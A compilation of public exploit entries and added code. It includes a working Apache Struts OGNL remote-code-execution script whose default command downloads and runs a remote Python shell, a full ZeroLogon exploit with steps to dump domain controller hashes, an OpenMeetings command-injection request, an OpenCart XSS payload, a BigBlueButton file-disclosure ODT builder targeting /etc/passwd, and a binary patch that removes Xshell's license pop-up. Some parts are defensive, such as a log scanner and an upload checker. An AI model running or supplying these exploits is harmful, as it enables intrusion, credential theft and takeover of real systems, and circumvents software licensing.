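A log-side check for the request shape the module above sends to kerbynet, added here as an example; it is not part of the Metasploit module or of Zeroshell. The access-log lines are constructed, and the detection is a signature over the decoded `x509type` query parameter (quote/newline break-out followed by `sudo tar ... --checkpoint-action=exec`).

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (not real traffic): a benign kerbynet request,
# a request shaped like the module's stager, and an unrelated page fetch.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=Admin HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2020:10:00:05 +0000] "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27 HTTP/1.1" 200 80
10.0.0.7 - - [01/Jan/2020:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# Common-log-format request line: source, timestamp, method, target, status.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# The tar checkpoint trick: sudo tar with an exec checkpoint action.
INJECTION_RE = re.compile(
    r"sudo\s+tar\b.*--checkpoint-action\s*=\s*exec",
    re.IGNORECASE | re.DOTALL,
)


def decode_params(target):
    """Return the query parameters with percent-encoding and '+' decoded.

    parse_qs already decodes once; decoding a second time also catches
    double-encoded values.
    """
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {k: [unquote(v) for v in vs] for k, vs in params.items()}


def inspect_line(line):
    """Return a finding dict for a suspicious kerbynet request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    if not urlsplit(target).path.endswith("/cgi-bin/kerbynet"):
        return None

    params = decode_params(target)
    reasons = []
    if params.get("Section") == ["NoAuthREQ"]:
        reasons.append("unauthenticated section")
    for value in params.get("x509type", []):
        # A certificate type name never needs a newline or a single quote.
        if "\n" in value or "'" in value:
            reasons.append("shell metacharacters in x509type")
        if INJECTION_RE.search(value):
            reasons.append("tar --checkpoint-action=exec in x509type")

    # NoAuthREQ on its own is ordinary usage; report only when the parameter
    # value itself looks like an injection.
    if len(reasons) <= 1:
        return None
    return {"src": m.group("src"), "timestamp": m.group("ts"), "reasons": reasons}


def scan(log_text):
    """Run inspect_line over every line and return the findings."""
    return [hit for hit in (inspect_line(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```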
17.
# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
# Google Dork: "Apache OpenMeetings DOS"
# Date: 2020-08-28
# Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research)
# Vendor Homepage: https://openmeetings.apache.org/
# Software Link: https://openmeetings.apache.org/
# Version: 4.0.0 - 5.0.0
# Tested on: Windows
# CVE: CVE-2020-13951

- POC:
# Vulnerability variable: hostname
# Payload: x.x.x.x;ls
# Request exploit:

GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026

- Reference:
https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E
https://nvd.nist.gov/vuln/detail/CVE-2020-13951
18.
# Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting (Authenticated)
# Date: 24-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: 3.0.3.6
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29471

Vulnerable Parameters: Profile Image.

Steps-To-Reproduce:
1. Go to the opencart admin page.
2. Now go to the profile page.
* Before the next step write this in notepad ""><svg onload=alert("XSS")>" and save it as payload.png
3. Now edit the image and upload the image as payload.png.
4. The XSS will be triggered.
19.
# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation
# Date: 08/18/2020
# Exploit Author: West Shepherd
# Vendor Homepage: https://struts.apache.org/download.cgi
# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)
# CVE : CVE-2019-0230
# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.
# Source(s):
# https://github.com/PrinceFPF/CVE-2019-0230
# https://cwiki.apache.org/confluence/display/WW/S2-059
# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22

#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import logging


class Exploit:
    def __init__(
            self,
            target='',
            redirect=False,
            proxy_address=''
    ):
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.target = target
        self.session = requests.session()
        self.redirect = redirect
        self.timeout = 0.5
        self.proxies = {
            'http': 'http://%s' % proxy_address,
            'https': 'http://%s' % proxy_address
        } if proxy_address is not None and proxy_address != '' else {}
        self.query_params = {}
        self.form_values = {}
        self.cookies = {}
        boundary = "---------------------------735323031399963166993862150"
        self.headers = {
            'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
            'Accept': '*/*',
            'Connection': 'close'
        }
        # OGNL expression carried in the multipart filename; {COMMAND} is
        # substituted in send_payload().
        payload = "%{(#nike='multipart/form-data')." \
                  "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
                  "(#_memberAccess?(#_memberAccess=#dm):" \
                  "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \
                  "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \
                  "(#ognlUtil.getExcludedPackageNames().clear())." \
                  "(#ognlUtil.getExcludedClasses().clear())." \
                  "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \
                  "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \
                  "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
                  "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \
                  "(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." \
                  "getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
                  "(#ros.flush())}"
        self.payload = "--%s\r\nContent-Disposition: form-data; name=\"foo\"; " \
                       "filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % (
                           boundary, payload, boundary
                       )

    def do_get(self, url, params=None, data=None):
        return self.session.get(
            url=url,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            data=data,
            params=params
        )

    def do_post(self, url, data=None, params=None):
        return self.session.post(
            url=url,
            data=data,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            params=params
        )

    def debug(self):
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def send_payload(self, command='curl --insecure -sv https://10.10.10.10/shell.py|python -'):
        url = self.target
        stdout.write('sending payload to %s payload %s' % (url, command))
        resp = self.do_post(url=url, params=self.query_params, data=self.payload.replace('{COMMAND}', command))
        return resp


if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help=True, description='CVE-2019-0230 Struts 2 exploit')
    try:
        parser.add_argument('-target', action='store', help='Target address: http(s)://target.com/index.action')
        parser.add_argument('-command', action='store', help='Command to execute: touch /tmp/pwn')
        parser.add_argument('-debug', action='store', default=False, help='Enable debugging: False')
        parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080')
        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()
        exp = Exploit(
            proxy_address=options.proxy,
            target=options.target
        )
        if options.debug:
            exp.debug()
        stdout.write('target %s debug %s proxy %s\n' % (
            options.target, options.debug, options.proxy
        ))
        result = exp.send_payload(command=options.command)
        stdout.write('Response: %d\n' % result.status_code)
    except Exception as error:
        stderr.write('error in main %s' % str(error))
20.
Xshell and Xftp are among my favourite and most commonly used tools. Many advantages have been improved since Xshell was upgraded to the seventh version. Because my cousin refused to accept life, he could only use the free version. However, after using the free version, a pop-up window with the free-license declaration appears. As a patient with obsessive-compulsive disorder, I cannot tolerate this. This article solves this problem through our assembly method!

Beginner
Since it is a pop-up window, many security tools have a pop-up blocking function (360, Turquoise and Tencent Butler all contain this function). So we just need to intercept it. Here we take Tencent as an example. Set the following to intercept immediately! But at the moment the software is closed, something will come out. (Of course this is also something that patients with obsessive-compulsive disorder cannot tolerate.)

Assembly
Decompile
Required compilation tool: 010Editor
Official website download: https://www.sweetscape.com/010editor/
Download the 010Editor binary modification tool; the free trial for 30 days is enough. Be careful to back up first!
010Editor: open xshell.exe, search globally for 74 11 6A 00 6A 07 6A 01, change the leading 74 to EB (note that it is capitalized) and save.

Effect
Video Explanation
21. # Exploit Title: ZeroLogon - Netlogon Elevation of Privilege
# Date: 2020-10-04
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2
# Tested on: Microsoft Windows Server 2016 Standard x64
# CVE : CVE-2020-1472
# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code
# Sources: https://www.secura.com/pathtoimg.php?id=2055
# Requirements: python3 and impacket 0.9.21+ (tested using this version)

#!/usr/bin/env python3
import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs
from binascii import hexlify, unhexlify
from subprocess import check_call
from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
from impacket.dcerpc.v5 import nrpc, epm, transport
from impacket import crypto, version
from impacket.examples import logger
from Cryptodome.Cipher import AES
from struct import pack, unpack
from impacket.dcerpc.v5.rpcrt import DCERPCException


class Exploit:
    def __init__(
            self, name='', address='', attempts=2000, password=''
    ):
        name = name.rstrip('$')
        self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\
            .ServerSecureChannel
        self.authenticator = self.getAuthenticator(stamp=0)
        self.clearNewPasswordBlob = b'\x00' * 516
        self.primaryName = ('\\\\%s' % name) + '\x00'
        self.accountName = ('%s$' % name) + '\x00'
        self.computerName = name + '\x00'
        # all-zero challenge and credential: the ZeroLogon condition
        self.clientCredential = b'\x00' * 8
        self.clientChallenge = b'\x00' * 8
        self.negotiateFlags = 0x212fffff
        self.address = address
        self.max = attempts
        self.dce = None
        self.sessionKey = None
        self.clientStoredCredential = None
        self.password = password

    def encodePassword(self, password):
        if isinstance(password, str):
            password = password.encode('utf-8')
        return b'\x00' * (512 - len(password))\
            + password \
            + pack('<L', len(password))

    def getAuthenticator(self, creds=b'\x00' * 8, stamp=10):
        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
        authenticator['Credential'] = creds
        authenticator['Timestamp'] = stamp
        return authenticator

    def serverReqChallenge(self):
        try:
            binding = epm.hept_map(
                self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'
            )
            self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
            self.dce.connect()
            self.dce.bind(nrpc.MSRPC_UUID_NRPC)
            return nrpc.hNetrServerReqChallenge(
                self.dce, self.primaryName, self.computerName, self.clientChallenge
            )
        except BaseException as ex:
            self.logError(ex)

    def serverAuthenticate(self):
        try:
            auth = nrpc.hNetrServerAuthenticate3(
                self.dce, self.primaryName, self.accountName,
                self.secureChannelType, self.computerName,
                self.clientCredential, self.negotiateFlags
            )
            assert auth['ErrorCode'] == 0
            self.logInfo('successfully authenticated')
            return True
        except nrpc.DCERPCSessionError as ex:
            self.dce = None
            # STATUS_ACCESS_DENIED: this attempt's session key did not
            # produce an all-zero credential, try again
            if ex.get_error_code() == 0xc0000022:
                return None
            else:
                self.logFail(ex.get_error_code())
        except BaseException as ex:
            self.dce = None
            self.logFail(ex)
        self.dce = None

    def serverPasswordSet(self):
        try:
            return nrpc.hNetrServerPasswordSet2(
                self.dce, self.primaryName, self.accountName,
                self.secureChannelType, self.computerName,
                self.authenticator, self.clearNewPasswordBlob
            )
        except BaseException as ex:
            self.logError(ex)

    def authenticate(self):
        self.logInfo(
            'checking target, attempting to authenticate %d max attempts' % self.max
        )
        for attempt in range(0, self.max):
            self.logInfo('attempt %d' % attempt)
            self.serverReqChallenge()
            self.serverAuthenticate()
            if self.dce is not None:
                break
        if self.dce:
            return True
        else:
            self.logError('failed to authenticate')

    def exploit(self):
        self.logInfo('attempting password reset')
        reset = self.serverPasswordSet()
        if reset['ErrorCode'] == 0:
            self.logInfo('successfully reset password')
        else:
            self.logError('failed to reset password')
        return self

    def ComputeNetlogonCredentialAES(self, challenge):
        return nrpc.ComputeNetlogonCredentialAES(
            challenge, self.sessionKey
        )

    def logInfo(self, message):
        sys.stdout.write("[+] %s\n" % str(message))
        return self

    def logError(self, message):
        sys.stderr.write("[-] error %s\n" % str(message))

    def logFail(self, message):
        sys.stderr.write("[!] failure %s\n" % str(message))
        sys.exit(2)

    def restore(self):
        self.logInfo('attempting to restore password')
        self.clientChallenge = b'12345678'
        try:
            self.primaryName = NULL
            challenge = self.serverReqChallenge()
            # after the exploit the machine password is empty, so the session
            # key is derived from an empty password
            self.sessionKey = nrpc.ComputeSessionKeyAES(
                '', self.clientChallenge, challenge['ServerChallenge']
            )
            self.clientCredential = self.ComputeNetlogonCredentialAES(
                self.clientChallenge
            )
            try:
                self.serverAuthenticate()
            except Exception as e:
                if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
                    raise
            self.logInfo('restoring password')
            self.clientStoredCredential = pack('<Q', unpack('<Q', self.clientCredential)[0] + 10)
            self.authenticator = self.getAuthenticator(
                creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)
            )
            self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(
                self.encodePassword(self.password)
            )
            reset = self.serverPasswordSet()
            if reset['ErrorCode'] == 0:
                self.logInfo('successfully restored password')
            else:
                self.logError('failed to restore password')
        except Exception as ex:
            self.logError(ex)
        return self


if __name__ == '__main__':
    info = """
    NOTE - Exploitation will break the DC until restored, recommended guidelines:
    1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:
        cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>
    2. Exploit the DC - this will break the DC until restored:
        cve-2020-1472.py -do exploit -target <NETBIOS NAME> -ip <IP>
    3. Dump the DC - for the DA hashes, this will not contain the machine hex-pass:
        secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP>
    4. Dump the DC again - use the DA hash to get the machines hex-pass:
        secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>
    5. Restore target - this fixes the DC:
        cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP> -hex <HEXPASS>
    """
    parser = argparse.ArgumentParser(
        description='CVE-2020-1472 ZeroLogon Exploit - Netlogon Elevation of Privilege',
        add_help=True
    )
    try:
        parser.add_argument('-do', default='check', action='store',
                            help='What to do (default check): [check|restore|exploit]')
        parser.add_argument('-target', action='store',
                            help='NETBIOS name of target DC (not the FQDN)')
        parser.add_argument('-ip', action='store',
                            help='IP address of target DC')
        parser.add_argument('-password', default='', action='store',
                            help='The plaintext password to use to reset the DC')
        parser.add_argument('-hex', default='', action='store',
                            help='The hex password to use to restore the DC (recommended)')
        parser.add_argument('-max', default=2000, action='store',
                            help='Max attempts to authenticate with the DC (usually ~300 or less)')
        if len(sys.argv) < 3:
            parser.print_help()
            print(info)
            sys.exit(1)
        options = parser.parse_args()
        if options.do.lower() == 'check':
            Exploit(
                name=options.target, address=options.ip, attempts=int(options.max)
            ).authenticate()
        elif options.do.lower() == 'exploit':
            exp = Exploit(
                name=options.target, address=options.ip, attempts=int(options.max)
            )
            if exp.authenticate():
                exp.exploit()
        elif options.do.lower() == 'restore':
            if options.hex != '' and options.password == '':
                options.password = unhexlify(options.hex)
            if options.password != '':
                exp = Exploit(
                    name=options.target, address=options.ip, password=options.password
                ).restore()
            else:
                parser.print_help()
    except Exception as error:
        sys.stderr.write('[-] error in main %s\n' % str(error))
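The script above never computes a session key during the check or exploit phase; it just sends an all-zero client challenge and an all-zero client credential up to ~2000 times. That works because Netlogon's ComputeNetlogonCredential runs AES-128 in CFB8 mode with a fixed all-zero IV: if the first keystream byte is 0x00, the first ciphertext byte is 0x00, the shift register stays all zero, and all eight credential bytes come out zero, which happens for about 1 in 256 session keys. The block below is an added example, not part of the original post or of impacket. It implements CFB8 over a pluggable block function and uses a constructed SHA-256 keyed function as a stand-in for AES-128 (assumption: the property depends only on CFB8's feedback structure, so any 16-byte block function reproduces it; with real AES the rate is the same 1/256). The key loop then shows that the all-zero credential is accepted exactly for the keys whose first keystream byte is zero.

```python
# Added example (not from the original post, not impacket code): why an
# all-zero credential is valid for roughly 1 in 256 Netlogon session keys.
import hashlib
from typing import Callable, List

BLOCK = 16
ZERO_IV = b"\x00" * BLOCK          # the fixed IV MS-NRPC uses for AES credentials
ZERO_CHALLENGE = b"\x00" * 8       # what the exploit sends as ClientChallenge

BlockFn = Callable[[bytes, bytes], bytes]


def toy_block(key: bytes, block: bytes) -> bytes:
    """Constructed stand-in for AES-128 (assumption: only CFB8's feedback
    structure matters, so a keyed SHA-256 truncated to 16 bytes suffices)."""
    assert len(block) == BLOCK
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(enc: BlockFn, key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB with an 8-bit segment: output byte i is plaintext[i] XOR the first
    byte of enc(shift_register); the register then drops its oldest byte and
    appends the ciphertext byte just produced."""
    sr = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ enc(key, bytes(sr))[0]
        out.append(c)
        sr = sr[1:] + bytes([c])
    return bytes(out)


def netlogon_credential(enc: BlockFn, session_key: bytes, challenge: bytes) -> bytes:
    """ComputeNetlogonCredential, AES flavour: CFB8 over the 8-byte challenge
    with an all-zero IV. The fixed zero IV is the design flaw."""
    return cfb8_encrypt(enc, session_key, ZERO_IV, challenge)


def first_keystream_byte_is_zero(enc: BlockFn, key: bytes) -> bool:
    """The only condition that matters. Once the first ciphertext byte is 0 the
    shift register is all zero again, every later byte is derived from the
    same input, and the whole credential is zero."""
    return enc(key, ZERO_IV)[0] == 0


def zero_credential_keys(enc: BlockFn, n_keys: int) -> List[int]:
    """Keys (as integers 0..n_keys-1) for which a zero challenge yields an
    all-zero credential, i.e. for which the DC would accept the attacker's
    all-zero ClientCredential without knowing the machine password."""
    hits = []
    for k in range(n_keys):
        key = k.to_bytes(BLOCK, "big")
        if netlogon_credential(enc, key, ZERO_CHALLENGE) == b"\x00" * 8:
            hits.append(k)
    return hits


if __name__ == "__main__":
    n = 4096
    hits = zero_credential_keys(toy_block, n)
    print(f"{len(hits)}/{n} keys accept the all-zero credential "
          f"(expected about {n / 256:.0f}); first few: {hits[:5]}")
```

This is also why the fix (enforcing signed and sealed Netlogon channels, and rejecting all-zero client challenges) works without changing the cipher: the attacker can no longer retry until one of those 1-in-256 session keys comes up.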
  22. # Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery # Date: 2020-09-11 # Exploit Author: RedTeam Pentesting GmbH # Vendor Homepage: https://bigbluebutton.org/ # Version: BigBlueButton 2.2.25 RedTeam Pentesting discovered a vulnerability in the BigBlueButton web conferencing system which allows participants of a conference with permissions to upload presentations to read arbitrary files from the file system and perform server-side requests. This leads to administrative access to the BigBlueButton instance. Details ======= Product: BigBlueButton Affected Versions: 2.2.25, potentially earlier versions as well Fixed Versions: 2.2.27 Vulnerability Type: Arbitrary File Disclosure and Server-Side Request Forgery Security Risk: medium Vendor URL: https://bigbluebutton.org/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005 Advisory Status: published CVE: CVE-2020-25820 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820 Introduction ============ "BigBlueButton is a web conferencing system designed for online learning." (from the vendor's homepage) More Details ============ BigBlueButton is a web conferencing system that allows participants with the appropriate privileges to upload files in various formats to be used as presentation slides. Among other formats, BigBlueButton accepts LibreOffice documents[1]. LibreOffice documents use the XML-based Open Document Format for Office Applications (ODF)[2]. For technical purposes, uploaded files are converted to PDF format with LibreOffice and afterwards to SVG for displaying[6]. The ODF file format supports using the XML Linking Language (XLink) to create links between documents[3]. When local files are referenced using XLinks, the contents of the respective files are included in the generated PDF file when BigBlueButton converts ODF documents with LibreOffice. 
This leads to an arbitrary file disclosure vulnerability, allowing malicious participants of conferences to extract files from the BigBlueButton server's file system. LibreOffice also embeds XLinks to remote locations when a document is converted, which allows server-side requests to be performed.

Proof of Concept
================

Start from an empty ODF Text Document and extract the content:

$ mkdir tmp-doc && cd tmp-doc
$ unzip ../empty.odt
Archive: empty.odt
 extracting: mimetype
   creating: Configurations2/accelerator/
   creating: Configurations2/images/Bitmaps/
   creating: Configurations2/toolpanel/
   creating: Configurations2/progressbar/
   creating: Configurations2/statusbar/
   creating: Configurations2/toolbar/
   creating: Configurations2/floater/
   creating: Configurations2/popupmenu/
   creating: Configurations2/menubar/
  inflating: manifest.rdf
  inflating: meta.xml
  inflating: settings.xml
 extracting: Thumbnails/thumbnail.png
  inflating: styles.xml
  inflating: content.xml
  inflating: META-INF/manifest.xml

Replace the <office:body> element in the file content.xml with the following:

<office:body>
  <office:text>
    <text:section text:name="string">
      <text:section-source xlink:href="file:///etc/passwd" xlink:type="simple"
                           xlink:show="embed" xlink:actuate="onLoad"/>
    </text:section>
  </office:text>
</office:body>

The text document now includes a section that references the external file /etc/passwd. Create a new ODF Text Document with the modified content:

$ zip -r ../modified.odt *

The document can now be uploaded as a presentation. After the conversion, the presentation shows the contents of the file /etc/passwd from the system running the BigBlueButton conferencing software.
To perform server-side requests, substitute the xlink:href attribute's value with a remote URL such as http://example.com:

<office:body>
  <office:text>
    <text:section text:name="string">
      <text:section-source xlink:href="http://example.com" xlink:type="simple"
                           xlink:show="embed" xlink:actuate="onLoad"/>
    </text:section>
  </office:text>
</office:body>

When converting a document with this content, LibreOffice will fetch the website's content and embed it into the generated PDF file.

Workaround
==========

To work around this issue, the conversion feature should be disabled if it is not used. Otherwise, permission to upload presentations should only be given to trusted users. Additionally, the allowed file types for upload can be restricted to just PDF files.

Fix
===

Update to fixed version 2.2.27. Change the API key after the update.

Security Risk
=============

As shown, the presentation conversion feature of BigBlueButton can be used to disclose arbitrary local files. Through the file disclosure, attackers can gain access to the credentials of the BigBlueButton instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties, /usr/share/bbb-apps-akka/conf/application.conf), which allows for administrative access to BigBlueButton through its API (see [5]), including all conferences. Additionally, it is possible to perform server-side requests. Note that this vulnerability is different from CVE-2018-10583 [4], because the risk is not the disclosure of credentials sent while fetching remote resources, but the ability to access resources that are in the same network segment as the BigBlueButton instance, which is possibly not accessible from the Internet. To exploit this vulnerability, attackers need to have access to a conference with the ability to upload presentations.
While successful exploitation of this vulnerability would pose severe consequences for the affected BigBlueButton instance, it is only rated to pose a medium risk due to the requirement of having presenter access.

Timeline
========

2020-09-11 Vulnerability identified
2020-09-18 Customer approved disclosure to vendor
2020-09-22 CVE ID requested
2020-09-22 CVE ID assigned
2020-09-24 Requested encrypted communication with vendor
2020-09-25 Vendor unable to provide encrypted communication, Vendor notified
2020-09-25 Vendor confirmed being able to reproduce vulnerability, mentioned similar bug report
2020-09-25 Requested information whether "similar bug report" uses the same vulnerability - no answer
2020-10-13 Again requested information whether "similar bug report" uses the same vulnerability, whether release schedule is known - no answer
2020-10-14 Vendor released fixed version (without mentioning vulnerability)
2020-10-21 Vulnerability published by third party [7]
2020-10-21 Advisory released

References
==========

[1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton
[2] http://opendocumentformat.org/
[3] https://www.w3.org/TR/xlink11/
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
[5] https://docs.bigbluebutton.org/dev/api.html#usage
[6] https://docs.bigbluebutton.org/support/faq.html#presentations
[7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
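The advisory's proof of concept edits content.xml by hand inside an unpacked .odt. The block below is an added example, not from RedTeam Pentesting or the BigBlueButton project, that does the same thing programmatically and adds the check a defender wants: a scanner that opens an uploaded ODF package and reports every xlink:href pointing at a file:, http:, https:, ftp: or smb: target, which is what an upload filter in front of the LibreOffice conversion would need to reject. The package it builds is minimal (mimetype, content.xml, META-INF/manifest.xml) and the XML namespace and manifest boilerplate are mine; the xlink:show="embed" / xlink:actuate="onLoad" section source is exactly the advisory's. Assumption: LibreOffice accepts such a minimal package; if yours does not, unpack a real empty.odt as the advisory does and only swap content.xml.

```python
# Added example (not from the advisory or BigBlueButton): build the ODT with
# an external section source, and scan an ODT for such references.
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape
from typing import List, Tuple

MIMETYPE = "application/vnd.oasis.opendocument.text"
XLINK = "http://www.w3.org/1999/xlink"
RISKY_SCHEMES = ("file:", "http:", "https:", "ftp:", "smb:")

CONTENT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content
    xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
    xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
    xmlns:xlink="http://www.w3.org/1999/xlink"
    office:version="1.2">
  <office:body>
    <office:text>
      <text:section text:name="string">
        <text:section-source xlink:href="{href}" xlink:type="simple"
                             xlink:show="embed" xlink:actuate="onLoad"/>
      </text:section>
    </office:text>
  </office:body>
</office:document-content>
"""

MANIFEST_XML = """<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" manifest:version="1.2">
  <manifest:file-entry manifest:full-path="/" manifest:media-type="{mime}"/>
  <manifest:file-entry manifest:full-path="content.xml" manifest:media-type="text/xml"/>
</manifest:manifest>
"""


def build_odt(href: str) -> bytes:
    """Return a minimal ODT whose single section embeds `href` on load."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # ODF packaging rule: 'mimetype' is the first entry and is stored, not deflated.
        zf.writestr(zipfile.ZipInfo("mimetype"), MIMETYPE,
                    compress_type=zipfile.ZIP_STORED)
        zf.writestr("content.xml",
                    CONTENT_XML.format(href=escape(href, {'"': "&quot;"})),
                    compress_type=zipfile.ZIP_DEFLATED)
        zf.writestr("META-INF/manifest.xml", MANIFEST_XML.format(mime=MIMETYPE),
                    compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def validate_package(odt: bytes) -> dict:
    """Facts about the package an upload filter can check before conversion."""
    with zipfile.ZipFile(io.BytesIO(odt)) as zf:
        names = zf.namelist()
        info = zf.getinfo("mimetype")
        return {
            "first_entry": names[0],
            "mimetype_stored": info.compress_type == zipfile.ZIP_STORED,
            "mimetype": zf.read("mimetype").decode(),
        }


def external_section_sources(odt: bytes) -> List[Tuple[str, str]]:
    """(element, href) for every xlink:href in content.xml that reaches outside
    the document. An upload filter should reject a presentation if this is non-empty."""
    with zipfile.ZipFile(io.BytesIO(odt)) as zf:
        root = ET.fromstring(zf.read("content.xml"))
    found = []
    for el in root.iter():
        href = el.get(f"{{{XLINK}}}href")
        if href and href.lower().startswith(RISKY_SCHEMES):
            found.append((el.tag.split("}")[-1], href))
    return found


if __name__ == "__main__":
    doc = build_odt("file:///etc/passwd")
    print(validate_package(doc))
    print(external_section_sources(doc))   # [('section-source', 'file:///etc/passwd')]
```

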